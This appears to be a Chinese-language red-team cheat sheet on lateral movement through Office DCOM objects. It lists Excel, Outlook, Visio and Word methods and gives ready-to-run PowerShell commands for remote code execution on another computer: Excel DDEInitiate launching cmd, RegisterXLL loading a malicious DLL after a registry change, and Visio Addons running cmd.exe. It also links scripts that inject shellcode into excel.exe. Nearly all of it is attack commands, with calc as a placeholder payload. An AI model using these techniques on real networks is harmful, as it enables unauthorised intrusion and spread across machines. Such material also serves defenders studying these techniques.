通过Office进行DCOM

Excel.Application
  DDEInitiate
  RegisterXLL
Outlook.Application
  CreateObject->Shell.Application->ShellExecute
  CreateObject->ScriptControl (office-32bit only)
Visio.InvisibleApp
  Addons
  ExecuteLine
Word.Application
  RunAutoMacro
通过 ExecuteExcel4Macro 通过 DCOM 将 shellcode 注入 excel.exe 的 Powershell 脚本
>Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9
>Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a
使用Excel DDE
PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
PS C:\> $excel.DisplayAlerts = $false
PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe")
使用 Excel RegisterXLL
不能可靠地与远程目标一起使用
Require: reg add HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations /v AllowsNetworkLocations /t REG_DWORD /d 1
PS> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
PS> $excel.RegisterXLL("EvilXLL.dll")
使用Visio
$visio = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.InvisibleApp", "$ComputerName"))
$visio.Addons.Add("C:\Windows\System32\cmd.exe").Run("/c calc")